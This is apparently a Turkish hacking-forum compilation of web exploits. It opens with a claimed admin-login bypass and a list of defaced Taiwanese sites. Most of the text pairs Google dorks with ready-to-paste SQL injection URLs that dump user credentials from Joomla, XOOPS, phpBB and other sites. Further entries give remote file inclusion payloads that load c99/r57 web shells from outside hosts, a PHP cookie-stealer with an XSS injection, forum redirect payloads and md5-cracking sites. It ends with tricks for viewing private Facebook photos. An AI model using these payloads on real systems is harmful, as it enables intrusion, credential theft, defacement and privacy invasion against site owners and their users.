|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*| |--------------------------------------------------------------| |[+] Exploit Title: PGO CMS Admin Page Bypass |[+] |[+] Exploit Author: Ashiyane Digital Security Team |[+] |[+] Vendor Homepage: http://www.pgo.tw/ |[+] |[+] Google Dork: intext:"趴趴狗旅遊網設計" |[+] |[+] Tested on: Windows 10, Google Chrome |[+] |[+] Date: 11 Dec 2015 |[+] |--------------------------------------------------------------| |[+] Examples : |[+] |[+] Exploit: Use '=' 'or to login. |[+]
Tayvan Siteleri Hacklendi…
- http://minsu.pgo.tw/
- http://www.hack-mirror.com/363650.html
- http://golgeler.net/view%3E352106
- ————————————–
- http://8651315.com/
- http://z0n.org/mirror/id/87946
- http://www.hack-mirror.com/363652.html
- http://golgeler.net/view-%3E352109
- ———————————–
- http://www.casa255257.com/?id=595901#pgo
- http://golgeler.net/view-%3E352118
- —————————————
- http://www.waterripple.tw/?id=595061#pgo
- http://www.hack-mirror.com/363927.html
- http://golgeler.net/view-%3E352121
2
PostSchedule Açığı
Google Dork : “PostSchedule ver 1”
Exploid:
index.php?module=PostSchedule&view=event&eid=-1′)+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname ,char(58),pn_pass),10,11,12,13/**/from/**/nuke_users/**/where/**/pn_uid=2/*
joomla SQL Injection(Com-Jokes) Açığı
DorK : allinurl: “com_jokes”
EXPLOIT :
index.php?option=com_jokes&Itemid=bgh7&func=CatVie w&cat=-776655/**/union/**/select/**/0,1,2,3,username,5,password,7,8/**/from/**/mos_users/*
Com_Estateagent Açığı
Dork : allinurl: “com_estateagent”
EXPLOIT :
index.php?option=com_estateagent&Itemid=bgh7&func= showObject&info=contact&objid=-9999/**/union/**/select/**/username,password/**/from/**/mos_users/*&results=xxxx
Com-Fq Açığı
DorK: allinurl: “com_fq”
EXPLOIT :
index.php?option=com_fq&Itemid=S@BUN&listid=999999 9/**/union/**/select/**/name,password/**/from/**/mos_users/*
Com-Mamml Açığı
DorK : allinurl: “com_mamml”
EXPLOIT :
index.php?option=com_mamml&listid=9999999/**/union/**/select/**/name,password/**/from/**/mos_users/*
joomla SQL Injection(com_gallery) Açığı
DORK : allinurl: com_gallery “func”
EXPLOIT 1 :
index.php?option=com_gallery&Itemid=0&func=detail& id=-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,use rname/**/from/**/mos_users/*
EXPLOİT 2 :
index.php?option=com_gallery&Itemid=0&func=detail& id=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A %2F0%2C1%2Cpassword%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C 0%2C0%2C0%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmo s_users
Joomla Component Profiler Açığı
DORK: allinurl:com_comprofiler
Exploit: /index.php?option=com_comprofiler&task=userProfile& user=[SQL]
Example: /index.php?option=com_comprofiler&task=userProfile& user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
Joomla Component Filiale SQL Injection Açığı
DORK : inurl:com_filiale
Exploit : /index.php?option=com_filiale&idFiliale=-5+union+select+1,password,3,4,username,6,7,8,9,10, 11+from+jos_users
FlippingBook Açığı
DORK : inurl:com_flippingbook
Exploit :
/index.php?option=com_flippingbook&Itemid=28&book_i d=null/**/union/**/select/**/null,concat(username,0x3e,password),null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null/**/from/**/jos_users/*
Pagenum Açığı
DORK : allinurl: – list.php?pagenum”
EXPLOIT
list.php?pagenum=0&categoryid=1+union+select+111,2 22,concat_ws(char(58),login,password),444+from+adm in_login/*
Modules-Tutorials Açığı
DORK 1 : allinurl :-/modules/tutorials/-
DORK 2 : allinurl :-/modules/tutorials/”tid
EXPLOIT 1 :
modules/tutorials/printpage.php?tid=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),1,concat(uname,0x3a,pass), 3,4,5/**/from/**/xoops_users/*
EXPLOIT 2 :
modules/tutorials/index.php?op=printpage&tid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3/**/from/**/xoops_users/*
Modules-Glossaires Açığı
DORK : allinurl: “modules/glossaires”
EXPLOIT :
modules/glossaires/glossaires-p-f.php?op=ImprDef&sid=99999/**/union/**/select/**/000,pass,uname,pass/**/from/**/xoops_users/*where%20terme
OsCommerce SQL Injection Açığı
Google Dork: inurl:”customer_testimonials.php”
Exploit:
http://site.com/customer_testimonial…l_id=99999+uni on+select+1,2,concat(customers_lastname,0x3a,custo mers_password,0x3a,customers_email_address),4,5,6, 7,8+from+customers/*
Not: Aynı zamanda yönetici değilde bütün üyelerin md5 lerini karşınıza dizer.
Tr ****** News v2.1 Açığı
Google Dork: inurl:news.php?mode=voir
Exploid: news.php?mode=voir&nb=-1/**/UNION/**/SELECT/**/1,2,3,4,concat_ws(0x3a,pseudo,pass,email),6,7/**/from/**/tr_user_news/*
Admin girişi = /admin
Com-Alberghi Açığı
DORK 1 : allinurl: — detail
DORK 2 : allinurl: “com_alberghi”
EXPLOIT 1 :
index.php?option=com_alberghi&task=detail&Itemid=S @BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2 ,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,con cat(username,0x3a,password)/**/from/**/jos_users/*
EXPLOIT 2 :
index.php?option=com_alberghi&task=detail&Itemid=S @BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2 ,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3 ,3,3,3,concat(username,0x3a,password)/**/from/**/jos_users/*
Powered By Joovideo V1.0 Açığı
DORK 1 : allinurl: “com_joovideo” detail
DORK 2 : allinurl: “com_joovideo”
DORK 3 : Powered by joovideo V1.0
EXPLOIT :
index.php?option=com_joovideo&Itemid=S@BUN&task=de tail&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1,1,1,2,2,2,2 ,2,concat(username,0x3a,password)/**/from/**/jos_users/*
AllMy-Guests ****** Açığı
Açığı bulunan ******: AllMyGuests
Google Dork: “powered by AllMyGuests” (Tırnaklar yok)
Example (Exploid): http://site.de/allmyguest/index.php?…ull+UNION+SELE CT+1,2,3,concat_ws(0x203a20,user_name,user_passwor d,user_email),5,6,7+from+allmyphp_user+where+user_ id=1–
123FlashChat Açığı
DORKS : “123flashchat.php”
EXPLOITS :
http://localhost/path/123flashchat.php?e107path=Shell
AlphaContent 2.5.8 © Açığı
DORK 1 : inurl: “com_alphacontent”
DORK 2 : “AlphaContent 2.5.8 © 2005-2008 – visualclinic.fr”
Exploit :
index.php?option=com_alphacontent§ion=6&cat=15 &task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user() ,user(),user(),user(),user(),user(),user(),user(), user(),user(),user(),user(),user(),user(),user(),u ser(),user(),user(),user(),user(),user(),user(),us er(),user(),user(),user(),user(),user(),user(),use r(),user(),user(),user(),39/**/from/**/jos_users/*
Mambo Component (com-downloads) Açığı
DORK : allinurl :”com_downloads”filecatid
EXPLOIT :
index.php?option=com_downloads&Itemid=S@BUN&func=s electfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3 a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
MiniNuke 2.1 Açığı
DORK 1 : allinurl:”members.asp?action”
DORK 2 : allinurl: “members.asp”uid
EXPLOIT 1 :
members.asp?action=member_details&uid=-1%20union%20select%200,sifre,0,0,0,0,0,kul_adi,0,s ifre,kul_adi,sifre,1,1,1,sifre,1,1,1,isim,1,1,1,1, 1,1,1,1%20from%20members
EXPLOIT 2 :
members.asp?action=member_details&uid=-1%20union%20select%200,0,0,0,0,0,0,sifre,0,sifre,0 ,1,1,sifre,14,sifre,1,1,1,1,2,1,2,2,2,2,2,2,2,2%20 from%20members
EXPLLOIT 3 :
members.asp?action=member_details&uid=-1%20union%20select%200,1,sifre,0,0,0,0,0,0,0,1,1,1 ,1,1,1,1,1,1,1,2,2,kul_adi,sifre,2,kul_adi,sifre,2 ,2,2,sifre,3,3,3,isim,3,3,3,3,3,4,4,4%20from%20mem bers
Modules-Wepchat Açığı
DORK : allinurl :”modules/WebChat”
EXPLOIT :
modules/WebChat/index.php?roomid=-9999999/**/union/**/select/**/0,uname,0x3a,0x3a,pass/**/from/**/exv2_users/*where%20exv2_admin%201
Modules-Repice Açığı
DORK : allinurl :”modules/recipe”
EXPLOIT :
modules/recipe/detail.php?id=-9999999%2F%2A%2A%2Funion%2F%2A%2A%2
Fselect/**/0,0,uname,pass,111,222+from%2F%2A%2A%2Fxoops_users/*
eXV2 MyAnnonces Açığı
DORK : eXV2 MyAnnonces
EXPLOIT :
modules/MyAnnonces/annonces-p-f.php?op=ImprAnn&lid=-9999999/**/union/**/select/**/pass,pass,uname,0x3a,0x3a,0x3a,0x3a,0,0,0,0x3a,0x3 a,1/**/from/**/exv2_users/*where%20exv2_admin%201
Modules-Dictionary Açığı
DORK 1 : allinurl: “modules/dictionary”
DORK 2 : allinurl: “modules/dictionary/print.php?id”
EXPLOIT :
modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
Geçerli versiyonlar;
Dictionary Version 0.94 by nagl.ch
Dictionary Version 0.91 by nagl.ch
Dictionary Version 0.70 by nagl.ch
Com-Restaurante Açığı
DORK : allinurl: “com_restaurante”
EXPLOIT :
index.php?option=com_restaurante&task=detail&Itemi d=S@BUN&id=-99999/**/union/**/select/**/0,0,0x3a,0,0,0,0,0,0,0,0,11,12,1,1,1,1,1,1,1,1,2,2 ,2,2,2,2,2,2,2,2,3,3,3,3,3,3,3,3,3,3,4,4,4,4,conca t(username,0x3a,password)/**/from/**/jos_users/*
Com-Accombo Açığı
DORK : allinurl: “com_accombo”
EXPLOIT :
index.php?option=com_accombo&func=detail&Itemid=S@ BUN&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,concat(username,0x 3a,password)/**/from/**/mos_users/*
Powered By Runcms Açığı
DORK 1 : allinurl: “modules/photo/viewcat.php?id”
DORK 2 : inurlhoto “powered by runcms”
EXPLOIT :
admin/exploit
modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,uname/**/from/**/runcms_users/*
pass/exploit
modules/photo/viewcat.php?id=150&cid=-99999/**/union/**/select/**/0,pass/**/from/**/runcms_users/*
Not: Admin/exploit’i site sonuna yapıştırırsak admin nick verir.
Pass/exploit’i yapıştırırsak md5 leri verir.
Admin girişi:
http://www.bbb.net/admin
Powered By Download 3000 Açığı
DORK 1 : “Powered by Download 3000”
DORK 2 : allinurl: “com_d3000”
EXPLOiT :
index.php?option=com_d3000&task=showarticles&id=-99999/**/union/**/select/**/0,username,pass_word/**/from/**/admin/*
Powered By Smoothflash Açığı
DORK 1 : “Powered by Smoothflash”
DORK 2 : allinurl: “admin_view_image.php”
EXPLOiT :
admin_view_image.php?cid=-99999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/lwsp_users
Com-Ahsshop Açığı
DORK : allinurl: “com_ahsshop”do=default
EXPLOiT 1 :
index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,3,4,0x3a,6,0 x3a/**/from/**/mos_users/*
EXPLOiT 2 :
index.php?option=com_ahsshop&do=default&vara=-99999/**/union/**/select/**/concat(username,0x3a,password),1/**/from/**/mos_users/*
Mod-Archives Açığı
DORK : allinurl: “index.php?mod=archives”
EXPLOiT :
index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0 x3a,pass),7,8,9,10,11,12,13/**/from/**/users/*
EXPLOiT 2:
index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0 x3a,pass),7,8,9,10/**/from/**/users/*
EXPLOiT 3:
index.php?mod=archives&ac=voir&id=-99999/**/union/**/select/**/0,concat(pseudo,0x3a,pass),2,3,4,5,concat(pseudo,0 x3a,pass),7,8,9,10,11,12,13,14/**/from/**/users/*
Galery-Action Açığı
DORK : allinurl: “index.php?mod=galerie”action=gal
EXPLOiT :
index.php?mod=galerie&action=gal&id_gal=-99999/**/union/**/select/**/0,1,concat(pseudo,0x3a,pass),concat(pseudo,0x3a,pa ss),4,5,6,7/**/from/**/users/*
Powered By Site Sift Açığı
DORK 1 : powered by Site Sift
DORK 2 : allinurl: “index php go addpage”
DORK 3 : allinurl: “index.php?go=detail id=-
EXPLOiT 1:
index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16/**/from/**/admin/*
EXPLOİT 2:
index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19,20/**/from/**/admin/*
Galery-İmg Açığı
DORK : allinurl: “index.php?p=gallerypic img_id”
EXPLOiT 1:
index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6 ,7,8+from+koobi4_user
EXPLOiT 2:
index.php?p=gallerypic&img_id=-1+union+select+0,1,2,concat(email,0x3a,pass),4,5,6 ,7,8+from+koobi_user
Galid-Galeri Açığı
DORK : allinurl: galid “index.php?p=gallerypic”
EXPLOiT :
index.php?p=gallerypic&img_id=S@BUN&galid=-1+union+select+0,concat(email,0x3a,pass),2+from+kp ro_user
Area-Galid Açığı
DORK : allinurl: “index.php?area”galid
EXPLOiT :
index.php?area=1&p=gallery&action=showimages&galid =-1+union+select+0,concat(email,0x3a,pass),2+from+kp ro_user
Shop-Categ Açığı
DORK : allinurl: “index php p shop”categ
EXPLOiT :
index.php?p=shop&show=showdetail&fid=S@BUN&categ=-1+union+select+0,concat(email,0x3a,pass),2+from+kp ro_user
Showlink Açığı
DORK : allinurl: “index.php?showlink”links
EXPLOiT :
index.php?showlink=BGH7&fid=BGH78&p=links&area=1&c ateg=-1+union+select+0,concat(email,0x3a,pass),2+from+kp ro_user
admin login=admin/login.php
RS MAXSOFT Açığı
DORK 1 : “RS MAXSOFT”
DORK 2 : “Provozováno na RS MAXSOFT”
EXPLOiT:
modules/fotogalerie/popup_img.php?fotoID=-1+union+select+concat(login,0x3a,pass)+from+admin
PollBooth Açığı
DORK : allinurl: “pollBooth.php?op=results”pollID
EXPLOiT :
pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users
Showresult Açığı
DORK 1 : allinurl: “index.php?p=poll”showresult
DORK 2 : allinurl: poll_id “showresult”
EXPLOiT :
index.php?p=poll&showresult=1&poll_id=-1+union+select+concat(email,0x3a,pass),1,2,3+from+ kpro_user
Fpdb/shop.mdb Açığı
google.com ‘da aratacağız;
inurl:”mall/lobby.asp
Sonra çıkan sitenin sonuna -‘fpdb/shop.mdb’- ekleyin “tırnaksız”.
örnek: Gem Depot Lobby Page – Search our Inventory
http://www.gemdepot.com/fpdb/shop.mdb
mdb diye dosya çıktı farklı kaydet diyoruz ve açıyoruz…
mdb gizlenmiş şifreyi alıp md5 kırıcı sitede kırıyoruz ve siteye giriş yapıp hackliyoruz…
Xopps Açığı
Dork: inurl:/modules/wfsection/
Exploide:
print.php?articleid=9999999 union select 1111,2222,3333,4444,concat(char(117,115,101,114,11 0,97,109,101,58),u*****char(112,97,115,115,119,111 ,114,100,58),pass),6666,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0 from xoops_users where uid like 1/*
Com_shambo2 Açığı
Dork(Googlede Aratacağımız Kod): “inurl:com_shambo2” (Tırnaklar yok.)
Exploid(Site Sonuna Ekleyeceğimiz Kod);
index.php?option=com_shambo2&Itemid=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A %2F0%2C1%2Cconcat(username,0x3a,password)%2C0%2C0% 2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F %2A%2A%2Ffrom%2F%2A%2A%2Fmos_users
PHP-Calendar Açığı
Arama : google.com => intitle:”EasyPHPCalendar
Site sonuna(Herhangi biri);
/calendar/calendar.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/functions/popup.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/events/header.inc.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/events/datePicker.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/setup/setupSQL.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
/calendar/setup/header.inc.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
Php-BB 2.0.18 Yönlendirme Açığı
öncelikle php destekli bi hostunuz olmalıdır. Google Free php host yazdığınız zaman bir sürü site çıkar. Şimdi yeni bi not defteri açın ve içine aynen bunları yazın. Ama en ufak bi kodlama hatasında sistem çalışmaz.
Kod:
<?php
$cookie = $_GET[?c?];
$ip = getenv (?REMOTE_ADDR?);
$date=date(“j F, Y, g:i a”);
$referer=getenv (?HTTP_REFERER?);
$fp = fopen(?cookies.txt?, ?a?);
fwrite($fp, ?Cookie: ?.$cookie.?<br> IP: ? .$ip. ?<br> Date and Time: ? .$date. ?<br> Referer: ?.$referer.?<br><br><br>?);
fclose($fp);
?>
Bunu farklı kaydet diyip örneğin ismini cookies.php yapalım. Daha sonra ftp den bu dosyayı hostumuza atalım.
Şimdi bir tane daha not defteri açın içine hiçbirşey yazmayın. Onu da php olarak kaydedelim ve ismini örneğin gelencookieler.php yapalım. Bunu da hostumuza atalım. Ama bu boş bıraktığımız gelencookilere.php dosyasına CHMOD ayarı vereceğiz. Sağ tıklayıp CHMOD a gelelim ve 777 ye ayarlayalım yani “okuma” “yazma” ve -çalıştırma” izni vermiş olacaksınız.
Bunu da hallettikten sonra phpbb 2.0.18 kurulu hedef bi site bulalım. Forumlardan birine bi konu açalım veya imzanızada yazabilirsiniz.
Kod:
<pre a=?>? onmouseover=?********.********=”http://www.sizinsiteniz.com/cookies.php?c=-+********.cookie? b=?<pre? >
Bu kodu yazıyoruz. Daha sonra sizin imzanıza yada açtığınız konudaki kodu görenlerin cookiesi gelencookieler.php ye dizilecek.
FullXml Açıgı
1.adım: http://www.google.com a giriyoruz “Fullxml” diye arama yapıyoruz,
2.adım: Seçtiğimiz gözümüze kestirdiğimiz siteye girip sonunua /db/member.xml ekliyoruz.
3.adım: Eğer admin adı ve şifre sorarsa //db/member.xml ekleyerek devam ediyoruz ve orda kullanıcı adları ve şifreler çıkar,
3.adım(2): Eger çıkmaz ise bu site dataları farklı yere saklamıştır. Bu site bu açıkla hacklenemez,
4.adım: Eger girerseniz admin panelinden uploada bastığınız anda dosya upload etmeye geçersınız ordan index’inizi basarsınız.
Bx-cp 0,3 Açığı
Google Dork: “bxcp 0,3″
Karşımıza çıkan sitelerin sonuna şu nu yapıstırmalıyız;
Exploide:
index.php?mod=files&action=view&where=-1+UNION+SELECT+users_nick,0,users_pwd,0,0,0,0,0,0, 0,0,0,0,0,0+FROM+{pre}_users+WHERE+users_id=1
Yönetici nick vs hash-ları verir.
Md5 leri kırabilmeniz için sitelerden bazıları;
http://gdataonline.com/seekhash.php
plain-text.info – Informationen zum Thema plain text. Diese Website steht zum Verkauf!
http://www.milw0rm.com/md5/index.php
cracking.com: The Leading Cracking Site on the Net
http://passcracking.com/Good_values_list.asp
[ md5 crack password crack hash checker ]
uploadpage.net: The Leading Upload Page Site on the Net
md5.rednoize.com – reverse engineer md5 hashes – powered by rednoize.com
crysm.net
My-PhpNuke’de Açık
Sistemin kodlanması esnasında galeri modülünde yapılan kodlama hataları, sisteme File Include atakları yapılmasına neden olmaktadır.
Code:
include (-$basepath/imageFunctions.php”);
Exploit:
/gallery/displayCategory.php?basepath=http://evil_scripts?
ShotCat Açığı
google araması:
allinurl: “showCat.php?cat_id”
site sonuna eklenecek kod:
showCat.php?cat_id=-99999/**/union/**/select/**/0,concat(user_name,0x3a,password),2/**/from/**/std_users/*
Not: Md5 de kırma istemez,
kullanıcı adları ve pass ları çıkar daha sonra menüde edit kısmı olur.
Com-Cinema Açığı
Aratılacak Kodumuz : allinurl: “com_cinema”
sitenin sonuna eklenecek kod:
index.php?option=com_cinema&Itemid=S@BUN&func=deta il&id=-99999/**/union/**/select/**/0,1,0x3a,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18, 19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat(u sername,0x3a,password)/**/from/**/jos_users/*
Googlede arattıkdan sonra karşımıza gelen sayfadan her hyangi bir siteyi seçiyoruz vs sitenin sonuna eklenecek kod-u yapıştırıyoruz. MD5 ler elimizde .
Facebook Güvenlik Açıkları
A-)Avatar Açıkları;
Avatarı büyütme… Örnekle açıklayalım: profile.ak.facebook.com/profile5/605/84/s677609740 _9399.jpg Burada gördüğünüz s harfi small?dan geliyor. Eğer onu silip onun yerine n yani normal yazarsak profile.ak.facebook.com/profile5/605/84/n677609740 _9399.jpg bu resmi büyütüp kaydedebiliyoruz. Sadece bu kadar değil. Bu adresteki profile5/605/84 kısmı kişisel güvenlik kısmıdır ama s677609740 ise kişinin kimliği denilebilecek bir numara, 9399 ise resmin ismidir. Aynı kullanıcının daha önce kullandığı avatarların tek farkı bu 9399 numarası olmasıdır. Bu avatarları Flashget?in batch download (toplu dosya indirme) özelliğini kısmına profile.ak.facebook.com/profile5/605/84/s677609740 _(*).jpg yazarak uzunluk olarak 4 karakterli sayılara karşılık gelen tüm avatarları bilgisayarımıza indirebiliyoruz.
B-)Kısıtlı Profili İzinsiz Açtırma;
Normalde profilleri arkadaşı olmayan kişiler tarafından görülmeyen hesaplar sadece mesaj yollanınca açılıyor. Örneğin adını duymadığınız bir kişi size bir mesaj atıyor; siz de doğal olarak cevaplıyorsunuz. Fakat siz mesajı attığınız anda mesajı attığınız kişi için profiliniz açık hale geliyor. Özellikleri kısıtlamış olsanız bile arkadaşlarınızı, resimlerinizi görebiliyor.
C-)Albüm Fotoğraflarını Görme;
Kısıtlı profilleri açtık ama sadece bir kaç resim mi gözüküyor? Tüm albümü görmek de Facebook açıkları sayesinde problem olmuyor. Facebook kullananlar bilir fotoğraftaki kişileri kutu içine alıp bir şeyler yazılabiliyor. Ama bu büyük bir tehlike. Şifreleme iyi olmadığı için başka kişiler de fotoğraflarınızı görebiliyor.
Örneğin photos-571.11.facebook/photos-11-sf2p/v136/48/92/692548571/n692548571_340324_6962.j pg Bu Facebook?un fotoğraf yükleyen üyelerden birine verdiği bir adres. Sadece bu fotoğraf herkese açık, diğerleri sadece arkadaşlarına açık. Yine buradaki photos-571 üye numarasının son 3 rakamı, en sonraki n692548571_340324_6962.jpg ise resmin şifrelenmiş kısa yoludur.[n= normal, 692548571= üye numarası, 340324=fotoğraf numarası, 6962=güvenlik numarası.]
Fakat burada fotoğraf numarasını bir artırır veya azaltır ve Flashget gibi programların batch download komutunu kullanırsak, bu güvenliği kolayca geçebiliyoruz. Facebook, bir resimden diğerine geçerken genelde önceki sayının 400 fazlasına yakın bir sayı üretiyor. Bu yüzden güvenliği kırmak en fazla 5 dakika sürüyor. Örneğin 340325 diğer yani 1 eksiği olan fotoğraf photos-571.11.facebook.com/photos-11-sf2p/v136/48/92/692548571/n692548571_340325_7760.j pg
Smf 1.1.4 RFI Bug Açığı
Google Dork : Powerd by SMF 1.1.4
Açık 1
/Sources/Subs-Graphics.php?settings[default_theme_dir]=http://jadlex.org/shell/c99.txt?
Açık 2
/Sources/Themes.php?settings[theme_dir]=http://jadlex.org/shell/c99.txt?
Phil-board Açıkları
google arama kodu : Powered by Philboard veya İnurl: philboard_forum.asp
İki şekildede aratabilirsiniz
adminin kullanıcı adı için
philboard_forum.asp?forumid=-1+union+select+0,username,2,3,4,5,6,7,8,7,8,9,10,1 1,12,13,14,15,16,17,18+from+users
parola için:
philboard_forum.asp?forumid=-1+union+select+0,password,2,3,4,5,6,7,8,7,8,9,10,1 1,12,13,14,15,16,17,18+from+users
yeni başlayanlar için elverişlidir
Dikkat= İyi bir anti-vir kullanmayanlar. Bazı siteler trojan örneği içermekte. Dikkatli olmanızı tafsiye ederim.
vBulletin Yönlendirme Açığı
vBulletin?de Her Sürümünde Top15 Açığı Bulunmuştur Aslında Bu Açık Çoktan Beri Var, ama Bu zamanda Ortaya Çıkmış. Bir vBulletin Sitesine Giriyorsunuz Forum Anasayfasın da Top15 Varsa işe koyuluyoruz;
Şimdi Yeni Konu Açıyorsunuz,( Nereye Açacağınız Fark Etmiyor)
ve
Konunun Başlıgına
******************* **********=-*******- *********”0;url=http://www.siteadresi.com”> —- >
Yazmanız yeterli msj bölümüne istediğinizi yazın …
Eğer açık kapatılmamış ise site yi yönlendirmiş olursunuz.
Bazı Yönlendirmeler;
Resim Çağırma;
<img xsrc=http://www.xxxx.com/resim.jpg>
swf iLe YönLendirme;
Css Çağırmak;
<link xhref=http://www.xxxx.com/dosya.css type=text/css rel=**********>
Çerçeve (Frame) iLe index;
body topmargin=0 leftmargin=0 onload=-********.body.innerHTML=–;->
StyLe iLe Tam Sayfa Resim Döşemek;
<body><style type=text/css>table, p, td, tr{visibility:hidden;}body {background-color: #000000;background-image: url(‘http://www.xxxx.com/resim.jpg’);}
Advanced Guestbook 2.4.2 Açığı
google dork: Advanced Guestbook 2.4.2 HTML code is enabled
eğer forumun en altında böyle bir yazı varsa= “HTML code is enabled” açık var demektir. Hemen yukardan sign the guestbook sekmesine tıklıyoruz.
Name yerine örnek nick yazıyoruz. Siz nickinizi yazın.
Aşağıya geliYoruz “your message” kısmına yönlendirme kodumuzu yazıyoruz;
<**** **********=-*******- *********”0;url=http://www.siteadresiniz.com”>
Sonra aşağıdaki güvenlik kodunu yazıP submit-e tıkllıyoruz.
Smf açıkları
Vuln:
Simple Machines SMF 1.1 rc2
Simple Machines SMF 1.0.8
Vuln Olmayanlar:
Simple Machines SMF 1.1 rc3
Simple Machines SMF 1.0.9
XSS:
http://www.example.com/index.php?action=login2″><******>alert(‘turkhackin -)</******>
——————————-
Vuln
SMF 1.0.7 ve aşağısı 1.1rc2 ve aşağısı
Banlanan kullnıcılar ip spoof yapıp tekrar girebiliyor..
————————————
Simple Machines Forum, Version 1.1 RC3
Simple Machines Forum (SMF) ManageBoards.php cur_cat Variable SQL Injection
Sql injection mevcut
http://archives.neohapsis.com/archiv…6-09/0009.html
———————————–
Simple Machines Forum <=1.1RC2 unset() vulnerabilities
http://retrogod.altervista.org/smf_11rc2_lock.html
Yeni joomla açıkları 3
Google Araması:
inurl:”com_zoom”
Site Sonuna:
/components/com_zoom/classes/fs_unix.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Site Sonuna:
/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:”com_serverstat”
Site Sonuna:
/administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=htt p://megaturks.by.ru/c99.txt?
Google Araması:
inurl:”com_fm”
Site Sonuna:
components/com_fm/fm.install.php?lm_absolute_path=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:com_mambelfish
Site Sonuna:
administrator/components/com_mambelfish/mambelfish.class.php?mosConfig_absolute_path=http://www.megaturks.com/images/shell.txt?
Google Araması:
inurl:com_lmo
Site Sonuna:
components/com_lmo/lmo.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Bazı joomla açıkları
Google Araması :
inurl:com_mosmedia veya index.php?option=com_mosmedia
Site Sonuna :
/components/com_mosmedia/media.tab.php?mosConfig_absolute_path=http://megaturks.by.ru/r57.txt?
Google Araması :
inurl:com_zoom veya index.php?option=com_zoom
Site Sonuna :
components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Google Araması:
allinurl:com_nfn_addressbook veya inurl:index.php?option=com_nfn_addressbook
Site Sonuna:
components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Site Sonuna2:
administrator/components/com_nfn_addressbook/nfnaddressbook.php?mosConfig_absolute_path=http://megaturks.by.ru/c99.txt?
Google Araması:
inurl:com_moodle
Site Sonuna:
components/com_moodle/moodle.php?mosConfig_absolute_path=http://www.megaturks.com/images/shell.txt?
detail.php?item_id==(SQL) açığı
Exploit in:
detail.php?item_id==(SQL)
Example:
(SQL)=-1%20union+select+1,2,3,concat(user_name,0x3a,passw ord),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from %20admin/*#
phpBB toplist.php açığı
Google arama
inurl:”toplist.php” “powered by phpbb”
aratıyoruz gelen sitelerin hepsinde deneyin ihtimal war
gelen sitelerde http://www.siteadi.com/phpbb/toplist.php buradaki toplist.php önemli sitenin dizini değil sadede geçelim buradaki toplist.php nin yerine alttaki kodu ekliyoruz
toplist.php?f=toplist_top10&phpbb_root_path=Shell Adresiniz
ekledikten sonra Return ve o nadide sayfa ( Açık Warsa Tabi )
toplist.php yerine eklenecek kod örneği
